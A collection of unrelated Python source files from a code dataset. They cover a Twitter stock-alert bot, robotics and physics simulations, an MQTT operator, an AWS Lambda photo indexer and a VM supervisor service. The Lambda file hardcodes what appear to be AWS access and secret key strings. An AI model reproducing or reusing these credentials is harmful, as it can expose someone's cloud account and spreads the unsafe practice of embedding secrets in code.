available in an open assembly @see: ioc.open!\n Provides all the entities references found in the current assembly wrapped in a AOP class.\n \n @return: AOP\n The resource AOP.\n '''\n return AOPResources({name:name for name, call in Assembly.current().calls.items() if isinstance(call, CallEntity)})\n\ndef entitiesLocal():\n '''\n !Attention this function is only available in an open assembly @see: ioc.open!\n Provides all the entities references for the module from where the call is made found in the current assembly.\n \n @return: AOP\n The resource AOP.\n '''\n registry = callerGlobals()\n if '__name__' not in registry:\n raise SetupError('The create call needs to be made from a module function')\n rsc = AOPResources({name:name for 
name, call in Assembly.current().calls.items() if isinstance(call, CallEntity)})\n rsc.filter(registry['__name__'] + '.**')\n return rsc\n\ndef entitiesFor(clazz, assembly=None):\n '''\n !Attention this function is only available in an open assembly @see: ioc.open!\n Provides the entities for the provided class (only if the setup function exposes a return type that is either the\n provided class or a super class) found in the current assembly.\n \n @param clazz: class\n The class to find the entities for.\n @param assembly: Assembly|None\n The assembly to find the entities in, if None the current assembly will be considered.\n @return: list[object]\n The instances for the provided class.\n '''\n assert isclass(clazz), 'Invalid class %s' % clazz\n assembly = assembly or Assembly.current()\n assert isinstance(assembly, Assembly), 'Invalid assembly %s' % assembly\n\n entities = (name for name, call in assembly.calls.items()\n if isinstance(call, CallEntity) and call.type and (call.type == clazz or issubclass(call.type, clazz)))\n\n Assembly.stack.append(assembly)\n try: return [assembly.processForName(name) for name in entities]\n finally: Assembly.stack.pop()\n\ndef entityFor(clazz, assembly=None):\n '''\n !Attention this function is only available in an open assembly @see: ioc.open!\n Provides the entity for the provided class (only if the setup function exposes a return type that is either the\n provided class or a super class) found in the current assembly.\n \n @param clazz: class\n The class to find the entity for.\n @param assembly: Assembly|None\n The assembly to find the entity in, if None the current assembly will be considered.\n @return: object\n The instance for the provided class.\n @raise SetupError: In case there is no entity for the required class or there are to many.\n '''\n assert isclass(clazz), 'Invalid class %s' % clazz\n assembly = assembly or Assembly.current()\n assert isinstance(assembly, Assembly), 'Invalid assembly %s' % assembly\n\n entities = [name for name, call in assembly.calls.items()\n if isinstance(call, CallEntity) and call.type and (call.type == clazz or issubclass(call.type, clazz))]\n if not entities:\n raise SetupError('There is no entity setup function having a return type of class or subclass %s' % clazz)\n if len(entities) > 1:\n raise SetupError('To many entities setup functions %r having a return type of class or subclass %s' %\n (', '.join(entities), clazz))\n\n Assembly.stack.append(assembly)\n try: return assembly.processForName(entities[0])\n finally: Assembly.stack.pop()\n\n# --------------------------------------------------------------------\n\ndef _classes(classes):\n '''\n Provides the classes from the list of provided class references.\n \n @param classes: list(class|AOPClasses)|tuple(class|AOPClasses)\n The classes or class reference to pull the classes from.\n @return: list[class]\n the list of classes obtained.\n '''\n assert isinstance(classes, (list, tuple)), 'Invalid classes %s' % classes\n clazzes = []\n for clazz in classes:\n if isinstance(clazz, str):\n clazzes.extend(classesIn(clazz).asList())\n elif isclass(clazz): clazzes.append(clazz)\n elif isinstance(clazz, AOPClasses):\n assert isinstance(clazz, AOPClasses)\n clazzes.extend(clazz.asList())\n else: raise SetupError('Cannot use class %s' % clazz)\n return 
clazzes\n","sub_path":"components/ally-utilities/ally/container/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":16271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"126886041","text":"import json\r\nimport schedule\r\nimport company\r\nimport smtplib\r\nimport logging\r\n\r\nfrom time import sleep\r\nfrom twitter import Twitter\r\nfrom datetime import datetime\r\n\r\n\r\n# Sets up logging info\r\nlogging.basicConfig(filename='./Files/logs.txt', level=logging.DEBUG,\r\n format='%(asctime)s :~: %(funcName)s :~: %(message)s')\r\n\r\n\r\nwith open(\"./Files/config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\n# Boolean value\r\nINITIAL_START = config[\"InitialStart\"]\r\n\r\n# Email/Password info\r\nEMAIL = config[\"EmailInfo\"][\"Email\"]\r\nPASSWORD = config[\"EmailInfo\"][\"Password\"]\r\n\r\n# Twitter keys/names\r\nTWITTER_HANDLES = config[\"TwitterAuth\"][\"Handles\"]\r\n\r\n\r\ndef email(handle, matches):\r\n \"\"\"Emails a list of people\"\"\"\r\n\r\n company_output = ', '.join([comp.upper() for comp in matches])\r\n\r\n try:\r\n with open('./Files/emails.txt') as f:\r\n email_list = f.read().split()\r\n\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.login(EMAIL, PASSWORD)\r\n server.sendmail(EMAIL, email_list,\r\n f'{handle} just tweeted about {company_output}. '\r\n f'Might be time to check your shares...')\r\n server.quit()\r\n\r\n except smtplib.SMTPResponseException as error:\r\n logging.debug(error)\r\n\r\n\r\ndef initial_start():\r\n print(\"Welcome to the Twitter Stock Monitor!\")\r\n twitter_handles = input(\"Enter the Twitter handles you want this bot to follow, separated by spaces: \\n\").split()\r\n\r\n with open('./Files/config.json') as json_f:\r\n json_data = json.load(json_f)\r\n\r\n json_data[\"TwitterAuth\"][\"Handles\"] = twitter_handles\r\n json_data[\"InitialStart\"] = False\r\n\r\n with open('./Files/config.json', 'w') as json_f:\r\n json.dump(json_data, json_f, sort_keys=True, indent=4, ensure_ascii=False)\r\n\r\n print(\"Creating files needed..\")\r\n\r\n for handle in twitter_handles:\r\n with open(f'./Files/LatestTweets/{handle}.txt', \"w\") as f:\r\n continue\r\n\r\n print(f'Files created! 
This bot will now begin to monitor: {twitter_handles}\\n\\n\\n')\r\n\r\n    return twitter_handles\r\n\r\n\r\ndef main():\r\n    # Checks if this is the first time running the script\r\n    # Allows the user to choose the Twitter Handles to follow\r\n    # Sets the TWITTER_HANDLES which is an empty list, to the new updated list\r\n    if INITIAL_START:\r\n        handles = initial_start()\r\n    else:\r\n        handles = TWITTER_HANDLES\r\n\r\n    # Sets up share_output job\r\n    twit = Twitter()\r\n    schedule.every().day.at(\"18:17\").do(twit.share_output)\r\n    schedule.every(15).minutes.do(company.current_day)\r\n\r\n    while True:\r\n        for handle in handles:\r\n            twitter = Twitter(handle)\r\n\r\n            new_tweet = twitter.get_latest_tweet()\r\n\r\n            # Checks if a new tweet has been posted\r\n            # If it has, checks for companies within the tweet\r\n            if new_tweet:\r\n                matches = company.check_for_companies(new_tweet, handle)\r\n\r\n                # If there is a company mentioned\r\n                if matches:\r\n                    # Gets the initial company info\r\n                    company.get_initial_company_info()\r\n\r\n                    # Outputs the matches via twitter/email\r\n                    twitter.initial_tweet(matches)\r\n                    email(handle, matches)\r\n\r\n            # Checks mentions for sign ups/removals\r\n            twitter.check_mentions()\r\n\r\n        # Gets current share price for each company being monitored\r\n        # Checks if there are any schedules to be run\r\n        company.get_current_shares()\r\n        schedule.run_pending()\r\n\r\n        now = datetime.now()\r\n        print(f'Running: {now.hour}:{now.minute} - {now.day}/{now.month}/{now.year}')\r\n        sleep(10)\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"602881429","text":"\r\nnum = sum = cont = 0\r\n\r\nwhile num != 666:\r\n    num = int(input('Enter a number: '))\r\n    if num == 666:\r\n        break\r\n    sum += num\r\n    cont = cont + 1\r\nprint(f' {cont} numbers were entered and the sum of all the numbers is {sum}')\r\n","sub_path":"ex066.py","file_name":"ex066.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"415605353","text":"import time as tm\nimport datetime as d\nfilename=\"results(dist).out\"\n\ndef weightInit(w):\n    y=open(str(filename),'a')\n    y.write(' Init weight values:'+str(w)+\"\\n\")\n    y.close()\n\ndef epochopener(w):\n    time=d.datetime.now()\n    current_time=time.strftime(\"%H:%M:%S\")\n    current_date=time.date()\n    y=open(str(filename),\"w\")\n    y.write(\" ©Nastos Vasileios 2020 ARTA\\n\")\n    y.write(\" Execute Perceptron Algorithm using Euclidean Distance Between the initial weights and the last weights of every epoch\\n\")\n    y.write(\" File created at:\"+str(current_time)+\"--\"+str(current_date)+\"\\n\")\n    y.close()\n    weightInit(w)\n    y=open(str(filename),\"a\")\n    y.write(\"---------------------------------------------------\\n\")\n    y.write(\"\\tNUMBER_SEQUENCE(e)\\tEPOCHS\\n\")\n    y.close()\n\ndef saver(e,epochs):\n    y=open(str(filename),\"a\")\n    y.write(\" \\t\"+str(e)+\"\\t \\t\\t\\t \"+str(epochs)+\"\\n\")\n    y.close()","sub_path":"perceptron/PERCPTON_EUCLIDEIAN/epochsaver.py","file_name":"epochsaver.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"59451455","text":"import numpy as np\nfrom scipy.integrate import ode\nfrom scipy.optimize import root\nfrom elasticity.Spatial import exp\nclass TwoTubesPlanar(object):\n    
\"\"\" Simulation class for a planar two tube robot.\n\n Attributes:\n k1b (int): What is this?\n\n\n Todo:\n * abc\n \"\"\"\n def __init__(self, k1b=None, k1t=None, k2b=None, k2t=None, kappa1=None, kappa2=None):\n\n if not k1b or not k1t:\n # Inner tube\n G1 = 21.5e9\n E1 = 58e9\n r_o1 = 2.39e-3 # Outer radius\n r_i1 = 2.01e-3 # Inner radius\n k1b = E1 * np.pi / 4 * (r_o1**4 - r_i1**4)\n k1t = G1 * np.pi / 2 * (r_o1**4 - r_i1**4)\n\n if not k2b or not k2t:\n # Inner tube\n G2 = 21.5e9\n E2 = 58e9\n r_o2 = 1.60e-3 # Outer radius\n r_i2 = 0.0 # Inner radius\n k2b = E2 * np.pi / 4 * (r_o2**4 - r_i2**4)\n k2t = G2 * np.pi / 2 * (r_o2**4 - r_i2**4)\n\n self.k1b = k1b\n self.k1t = k1t\n self.k2b = k2b\n self.k2t = k2t\n self.kappa1 = kappa1\n self.kappa2 = kappa2\n\n\n def _diff_equation(self, s, X):\n \"\"\" The differential equation\n \n Args:\n X: 2x1 state vector\n \"\"\"\n theta = X[0]\n theta_dot = X[1]\n\n theta_2dot = (self.k1b * self.k2b * self.kappa1 * self.kappa2 *\n (self.k1t + self.k2t) * np.sin(theta) / (self.k1b * self.k2b\n * (self.k1b + self.k2b))\n )\n return np.array([theta_dot, theta_2dot])\n\n def _forward_integrate(self, X0, step=0.01, s_end=1.0):\n \"\"\" Integrate from 0 -> s_end\n \"\"\"\n # Setup integrator\n itor = ode(self._diff_equation)\n itor.set_integrator('vode', method='bdf')\n itor.set_initial_value(X0, 0)\n\n step = 1.0 / np.round(1.0 / step) # Rounding\n\n X = [X0]\n\n while itor.successful() and itor.t < (s_end - 1e-6):\n itor.integrate(itor.t + step)\n X.append(itor.y)\n\n return np.array(X)\n\n def find_solution(self, theta0, guess=0.0, length=0.14):\n \"\"\" Find theta(L) using shooting method.\n\n Args:\n theta0: basically ``nothing``, *asterisk*, **double asterick**\n \"\"\"\n def g(theta_dot):\n X0 = np.array([theta0, theta_dot])\n\n XL = self._forward_integrate(X0, s_end=length)[-1]\n return XL[1]\n\n root_finding = root(g, guess)\n if root_finding['success']:\n X0 = np.array([theta0, root_finding['x']])\n XL = self._forward_integrate(X0)[-1] # End point\n return XL[0]\n else:\n return False\n\nclass TubePlotting(object):\n\n def __init__(self):\n pass\n\n def integrate_rotation(self, loc_curv, step=0.01):\n \"\"\" Integrate rotation from an array of local curvature.\n \"\"\"\n Rinit = np.eye(3)\n Rs = [Rinit]\n for w in loc_curv:\n v = loc_curv * step # infinitesimal twist\n R = np.dot(Rs[-1], exp(v))\n Rs.append(R)\n return Rs\n\n\n\n \n\n\n\n\n ","sub_path":"elasticity/ConcentricTubes.py","file_name":"ConcentricTubes.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"272641595","text":"# Copyright 2019 InfAI (CC SES)\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# #\n# http://www.apache.org/licenses/LICENSE-2.0\n# #\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport datetime\nimport json\nimport os\n\nimport paho.mqtt.client as mqtt\nfrom jsonpath_rw import jsonpath\nfrom jsonpath_rw_ext import parse\n\n# for calling extended methods\nimport jsonpath_rw_ext as jp\n\nCONFIG = json.loads(os.getenv(\"CONFIG\"))\nTOPICS = 
json.loads(os.getenv(\"INPUT\"))\n\nprint(CONFIG)\nprint(TOPICS)\n\ntest = jp.match1(\"$.[0].mappings[0].source\", TOPICS)\n\nval0 = 0\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \" + str(rc))\n client.subscribe(TOPICS[0][\"name\"])\n\n\ndef on_message(client, userdata, msg):\n global val0\n message = msg.payload.decode('utf8').replace('\"{', '{').replace('\"}', '}').replace('\\\\', '')\n js = json.loads(message)\n val = get_value(js)\n diff = val - val0\n val0 = val\n x = {\n \"pipeline_id\": get_config_value(\"pipelineId\"),\n \"operator_id\": get_config_value(\"operatorId\"),\n \"time\": '{}Z'.format(datetime.datetime.utcnow().isoformat()),\n \"analytics\": {\n \"diff\": diff\n }\n }\n client.publish(get_config_value(\"outputTopic\"), payload=json.dumps(x), qos=0, retain=False)\n\n\ndef get_value(js):\n return jp.match1(get_value_path(), js)\n\n\ndef get_value_path():\n return jp.match1(\"$.[0].mappings[0].source\", TOPICS)\n\n\ndef get_config_value(value):\n return jp.match1(value, CONFIG)\n\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(os.getenv(\"BROKER_HOST\", \"localhost\"), int(os.getenv(\"BROKER_PORT\", 1883)), 60)\n\nclient.loop_forever()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"106495935","text":"import create_ham as ch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sbn\nfrom scipy import linalg as la\nimport time\nimport functions as fn\nimport create_ham as cHam\nimport functions as func\nimport datetime\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\nsbn.set()\n\nL = 20\nu_in = 1.7\nu_out = 2.4\ncutoff = 0.5\ndisorder_parameter = 0.\n\ndelta = (2 * np.pi) / L\nN_total = L * L * 2\n\nxs_arr = np.arange(L)\nys_arr = np.arange(L)\n\nX_grid, Y_grid = np.meshgrid(xs_arr, ys_arr)\n\n# u_values = np.zeros((L , L )) + u\nedg = False\n# u_values = np.random.normal(u,disorder_parameter,(L, L ))\n\n\nu_values = ((X_grid - L/2).__abs__() <= L/4 )*((Y_grid - L/2).__abs__() <= L/4)*u_in + (((X_grid - L/2).__abs__() > L/4 ) + ((Y_grid - L/2).__abs__() > L/4))*u_out\n\n\n# plt.pcolor(u_values)\n# plt.colorbar()\n# plt.show()\n\nxs = np.zeros(N_total)\nys = np.zeros(N_total)\nfor i in range(N_total):\n _, xs[i], ys[i] = func.number_to_index(i, L)\nX_exp = np.diag(np.exp(1j * xs * delta))\nY_exp = np.diag(np.exp(1j * ys * delta))\nX_exp_star = np.diag(np.exp(-1j * xs * delta))\nY_exp_star = np.diag(np.exp(-1j * ys * delta))\n\nH = cHam.create_full_hamiltonian(u_values, edges=edg)\n\n# plt.pcolor(H.__abs__())\n# plt.show()\n\nP = H * 0\n\neigenvalues, eigenvectors = la.eigh(H)\nfor j in range(N_total):\n P += np.outer(eigenvectors[:, j], np.conj(eigenvectors[:, j])) if eigenvalues[j] <= 0 else 0\n\nUVUV = np.linalg.multi_dot([P, X_exp, P, Y_exp, P, X_exp_star, P, Y_exp_star, P])\nM = UVUV + np.eye(N_total, N_total) - P\n\nT, Z = la.schur(M)\nU, s_vals ,V = la.svd(M)\n\neigs = np.diag(T)\nnubers = np.arange(N_total)\n\n# plt.subplot(1,2,1)\n# thetas = np.linspace(0, 2 * np.pi, 1000)\n# x_circ = np.cos(thetas)\n# y_circ = np.sin(thetas)\n# plt.scatter((eigs).real, (eigs).imag)\n# plt.plot(x_circ+1, y_circ)\n# plt.plot(x_circ * cutoff, y_circ * cutoff)\n#\n# plt.subplot(1,2,2)\n# plt.plot(eigs.__abs__())\n# plt.plot(s_vals[::-1])\n# plt.draw()\n\ncancel_matrix = np.ones((N_total,N_total))\nfor i in 
range(N_total):\n    if (1-eigs[i]).__abs__() >=1 or eigs[i].__abs__() <= cutoff:\n        cancel_matrix[i,:] = 0\n        cancel_matrix[:,i] = 0\n        print(i)\n\nT_fixed = T*cancel_matrix + np.eye(N_total)*(1-cancel_matrix)\n\nplt.pcolor(T_fixed.real>= 1e-8)\nplt.show()\n\nM_fixed = np.linalg.multi_dot([Z, T_fixed, Z.conj().T])\n\nnext = la.logm(M_fixed)\nout = np.diag(next) * L * L\nbott_index_tr = np.imag(out[::2] + out[1::2]) / (2 * np.pi)\nbott_new_method = bott_index_tr.reshape([L, L])\n\nprint('new method done')\n\n# this finds the bott index using the old (dumb) method!\nns = la.null_space(UVUV, rcond = cutoff)\nsh = ns.shape\nQ = np.zeros((N_total,N_total), dtype= 'complex')\nfor n in range(sh[1]):\n    Q += np.outer(ns[:, n], np.conj(ns[:, n]))\nnext = la.logm(UVUV + Q*1000000)\nout = np.diag(next) * L * L\nbott_index_tr = np.imag(out[::2] + out[1::2]) / (2 * np.pi)\nbott_old_method = bott_index_tr.reshape([L, L])\n\nx_vector = np.arange(L)\ny_vector = np.arange(L)\nx_grid, y_grid = np.meshgrid(x_vector, y_vector)\n\nprint('old method done')\n\n\n# # this finds the bott index using the shit method!\n# ns = la.null_space(UVUV)\n# sh = ns.shape\n# Q = np.zeros((N_total,N_total), dtype= 'complex')\n# for n in range(sh[1]):\n#     Q += np.outer(ns[:, n], np.conj(ns[:, n]))\n# next = la.logm(UVUV + Q*1000000)\n# out = np.diag(next) * L * L\n# bott_index_tr = np.imag(out[::2] + out[1::2]) / (2 * np.pi)\n# bott_shit_method = bott_index_tr.reshape([L, L])\n#\n# print('shit method done')\n\nz_grid = bott_new_method\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n                linewidth=0, antialiased=False)\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n                linewidth=0, antialiased=False)\nplt.title('New Method')\nplt.draw()\n\n# z_grid = bott_shit_method\n# fig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n# ax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n#                 linewidth=0, antialiased=False)\n# ax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n#                 linewidth=0, antialiased=False)\n# plt.title('Shit Method')\n# plt.draw()\n\n\nz_grid = bott_old_method\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n                linewidth=0, antialiased=False)\nax.plot_surface(x_grid, y_grid, z_grid, cmap=cm.coolwarm,\n                linewidth=0, antialiased=False)\nplt.title('Old Method')\nplt.show()\n\n","sub_path":"test_bott_singular_values.py","file_name":"test_bott_singular_values.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"102709659","text":"\n## Create a function which returns the sum of all the individual digits in that integer.\n## For Example: if n=4326, return 4+3+2+6\n\ndef sum_func(n):\n\n    # Base case\n    if n == 0:\n        return 0\n    else:\n        # Use integer division so the recursion stays on ints and terminates\n        return n%10 + sum_func(n//10)","sub_path":"Data_Structures_and_Algorithm/4_Recursion/Int_sum_recursion.py","file_name":"Int_sum_recursion.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"32839214","text":"import json\nimport boto3\nimport datetime\nimport requests\nfrom requests_aws4auth import AWS4Auth\nACCESS_KEY = \"AKIA6RHHVSNYQLE2GsCUU\"\nSECRET_KEY = \"6FK94Cl9r0IGisjZioiRH0SKykSZTrH7VZ+tKnpD\" \nregion = 'us-east-1'\nes_service = 'es'\ncredentials = boto3.Session().get_credentials()\nawsauth = AWS4Auth(credentials.access_key, 
credentials.secret_key, region, es_service, session_token=credentials.token)\n\n\ndef lambda_handler(event, context):\n    bucket_name = event['Records'][0]['s3']['bucket']['name']\n    photo_name = event['Records'][0]['s3']['object']['key']\n    \n    reko = boto3.client('rekognition')\n    print(bucket_name)\n    print(photo_name)\n    print(reko)\n    \n    response = reko.detect_labels(\n        Image={'S3Object':{'Bucket':bucket_name,'Name':photo_name}},\n        MaxLabels=10)\n    \n    # print(response)\n    labels = response[\"Labels\"]\n    result = []\n    for l in labels:\n        result.append(l[\"Name\"])\n    print(result) \n    \n    body = {\"objectKey\": photo_name, \"bucket\": bucket_name, \n            \"createdTimestamp\":str(datetime.datetime.now()),\n            \"labels\": result\n    }\n    url = \"https://vpc-photos-f36imjquajxkq35w4i5j6xxdee.us-east-1.es.amazonaws.com/photos/_doc\"\n    \n    res = requests.post(url, auth=awsauth,\n                    data = json.dumps(body),\n                    headers = {\"Content-Type\": \"application/json\"})\n    print(json.loads(res.text))\n    \n    \n    return {\n        'statusCode': 200,\n        'body': json.dumps('Hello from Lambda!')\n    }\n    \n","sub_path":"LF/index_photo.py","file_name":"index_photo.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"105647351","text":"tokens = ('HEAD', 'TITLE', 'YEAR', 'INTEGER', 'FREQUENCY','UNIT')\r\nliterals = ['.', ':' ]\r\n\r\n# Tokens\r\nt_HEAD = r'^Series.*$'\r\nt_TITLE = r'.*Annual\\t'\r\nt_YEAR = r'^\\d{4}$'\r\nt_FREQUENCY = r'\\tA\\t'\r\nt_UNIT = r'\\tDollars.*$'\r\n\r\n# Ignored characters\r\nt_ignore = \" \\r\"\r\n\r\ndef t_INTEGER(t):\r\n    r'\\d+'\r\n    try:\r\n        t.value = int(t.value)\r\n    except ValueError:\r\n        print(\"Integer value too large %d\" % t.value)\r\n        t.value = 0\r\n    return t\r\n\r\ndef t_newline(t):\r\n    r'\\n+'\r\n    t.lexer.lineno += t.value.count(\"\\n\")\r\n\r\ndef t_error(t):\r\n    print(\"Illegal character '%s'\" % t.value[0])\r\n    t.lexer.skip(1)\r\n\r\n# Build the lexer\r\nimport ply.lex as lex # ply.lex comes from the ply folder in the PLY download.\r\nlexer = lex.lex()\r\n\r\n# Parsing rules\r\n\r\nglobal time_step\r\ntime_step = 0\r\n\r\ndef p_start(t):\r\n    '''start : HEAD\r\n             | empty\r\n             | data\r\n             | float\r\n    '''\r\n    # print (\"Saw: \", t[1])\r\n\r\n\r\ndef p_data(t):\r\n    'data : TITLE INTEGER FREQUENCY float UNIT'\r\n    print(\"Year, Price($/bbl): \" + str(t[2]) + \", \" + str(t[4]))\r\n\r\ndef p_float(t):\r\n    'float : INTEGER \".\" INTEGER'\r\n    t[0] = str(t[1]) + str(t[2]) + str(t[3])\r\n\r\ndef p_empty(t):\r\n    'empty : '\r\n    pass\r\n\r\ndef p_error(t):\r\n    if t == None:\r\n        print(\"Syntax error at '%s'\" % t)\r\n    else:\r\n        print(\"Syntax error at '%s'\" % t.value)\r\n\r\nimport ply.yacc as yacc # ply.yacc comes from the ply folder in the PLY download.\r\nparser = yacc.yacc()\r\n\r\nwhile True:\r\n    try:\r\n        s = input('')\r\n    except EOFError:\r\n        break\r\n    parser.parse(s)\r\n\r\n# To run the parser do the following in a terminal window: cat data.txt | python parse.py\r\n","sub_path":"junk/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"302400423","text":"#import the plt and wavfile modules \nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport os\nimport argparse\n\n# argparser\nparser = argparse.ArgumentParser(description=\"Plot audio spectrogram for .wav file\")\nparser.add_argument(\"audio_file\", type=str, help=\".wav file path\")\nargs = parser.parse_args()\n\nfile_path, 
file_name = os.path.split(args.audio_file)\nfile_path = os.path.join(file_path, file_name)\n\n# Read the wav file (mono)\nsamplingFrequency, signalData = wavfile.read(file_path)\n\n# Plot the signal read from wav file\nplt.title(f'Spectrogram of {file_name}')\nplt.subplot(111)\nplt.specgram(signalData,Fs=samplingFrequency)\nplt.magma()\nplt.xlabel('Time')\nplt.ylabel('Frequency')\nplt.show()","sub_path":"plot_spectrogram.py","file_name":"plot_spectrogram.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"630872456","text":"\"\"\"\nThe VM Supervisor is in charge of executing code, starting and stopping VMs and provides\nan API to launch these operations.\n\nAt its core, it is currently an asynchronous HTTP server using aiohttp, but this may\nevolve in the future.\n\"\"\"\nimport binascii\nimport logging\nfrom base64 import b32decode, b16encode\nfrom typing import Awaitable, Dict, Any\n\nimport msgpack\nfrom aiohttp import web, ClientResponseError, ClientConnectorError\nfrom aiohttp.web_exceptions import HTTPNotFound, HTTPServiceUnavailable, HTTPBadRequest, \\\n    HTTPInternalServerError\nfrom msgpack import UnpackValueError\n\nfrom aleph_message.models import ProgramMessage, ProgramContent\nfrom .conf import settings\nfrom .pool import VmPool\nfrom .storage import get_message\nfrom .vm.firecracker_microvm import ResourceDownloadError, VmSetupError\n\nlogger = logging.getLogger(__name__)\npool = VmPool()\n\n\nasync def index(request: web.Request):\n    assert request.method == \"GET\"\n    return web.Response(text=\"Server: Aleph VM Supervisor\")\n\n\nasync def try_get_message(ref: str) -> ProgramMessage:\n    # Get the message or raise an aiohttp HTTP error\n    try:\n        return await get_message(ref)\n    except ClientConnectorError:\n        raise HTTPServiceUnavailable(reason=\"Aleph Connector unavailable\")\n    except ClientResponseError as error:\n        if error.status == 404:\n            raise HTTPNotFound(reason=\"Hash not found\")\n        else:\n            raise\n\n\ndef build_asgi_scope(path: str, request: web.Request) -> Dict[str, Any]:\n    return {\n        \"type\": \"http\",\n        \"path\": path,\n        \"method\": request.method,\n        \"query_string\": request.query_string,\n        \"headers\": request.raw_headers,\n    }\n\n\nasync def run_code(message_ref: str, path: str, request: web.Request) -> web.Response:\n    \"\"\"\n    Execute the code corresponding to the 'code id' in the path.\n    \"\"\"\n\n    message: ProgramMessage = await try_get_message(message_ref)\n    message_content: ProgramContent = message.content\n\n    try:\n        vm = await pool.get_a_vm(message_content)\n    except ResourceDownloadError as error:\n        logger.exception(error)\n        raise HTTPBadRequest(reason=\"Code, runtime or data not available\")\n    except VmSetupError as error:\n        logger.exception(error)\n        raise HTTPInternalServerError(reason=\"Error during program initialisation\")\n\n    logger.debug(f\"Using vm={vm.vm_id}\")\n\n    scope: Dict = build_asgi_scope(path, request)\n\n    try:\n        result_raw: bytes = await vm.run_code(scope=scope)\n    except UnpackValueError as error:\n        logger.exception(error)\n        return web.Response(status=502, reason=\"Invalid response from VM\")\n\n    try:\n        result = msgpack.loads(result_raw, raw=False)\n        # TODO: Handle other content-types\n\n        logger.debug(f\"Result from VM: <<<\\n\\n{str(result)[:1000]}\\n\\n>>>\")\n\n        if \"traceback\" in result:\n            logger.warning(result[\"traceback\"])\n            return web.Response(\n                status=500,\n                reason=\"Error in VM execution\",\n                body=result[\"traceback\"],\n                
content_type=\"text/plain\",\n )\n\n headers = {key.decode(): value.decode()\n for key, value in result['headers']['headers']}\n\n return web.Response(\n status=result['headers']['status'],\n body=result[\"body\"][\"body\"],\n headers=headers,\n )\n except UnpackValueError as error:\n logger.exception(error)\n return web.Response(status=502, reason=\"Invalid response from VM\")\n finally:\n if settings.REUSE_TIMEOUT > 0:\n pool.keep_in_cache(vm, message_content, timeout=settings.REUSE_TIMEOUT)\n else:\n await vm.teardown()\n\n\ndef run_code_from_path(request: web.Request) -> Awaitable[web.Response]:\n \"\"\"Allow running an Aleph VM function from a URL path\n\n The path is expected to follow the scheme defined in `app.add_routes` below,\n where the identifier of the message is named `ref`.\n \"\"\"\n path = request.match_info[\"suffix\"]\n path = path if path.startswith(\"/\") else f\"/{path}\"\n\n message_ref: str = request.match_info[\"ref\"]\n return run_code(message_ref, path, request)\n\n\ndef b32_to_b16(hash: str) -> bytes:\n \"\"\"Convert base32 encoded bytes to base16 encoded bytes.\"\"\"\n # Add padding\n hash_b32: str = hash.upper() + \"=\" * (56 - len(hash))\n hash_bytes: bytes = b32decode(hash_b32.encode())\n return b16encode(hash_bytes).lower()\n\n\nasync def run_code_from_hostname(request: web.Request) -> web.Response:\n \"\"\"Allow running an Aleph VM function from a hostname\n\n The first component of the hostname is used as identifier of the message defining the\n Aleph VM function.\n\n Since hostname labels are limited to 63 characters and hex(sha256(...)) has a length of 64,\n we expect the hash to be encoded in base32 instead of hexadecimal. Padding is added\n automatically.\n \"\"\"\n path = request.match_info[\"suffix\"]\n path = path if path.startswith(\"/\") else f\"/{path}\"\n\n message_ref_base32 = request.host.split(\".\")[0]\n if settings.FAKE_DATA:\n message_ref = \"test\"\n else:\n try:\n message_ref = b32_to_b16(message_ref_base32).decode()\n except binascii.Error:\n raise HTTPNotFound(reason=\"Invalid message reference\")\n\n return await run_code(message_ref, path, request)\n\n\napp = web.Application()\n\napp.add_routes([web.route(\"*\", \"/vm/{ref}{suffix:.*}\", 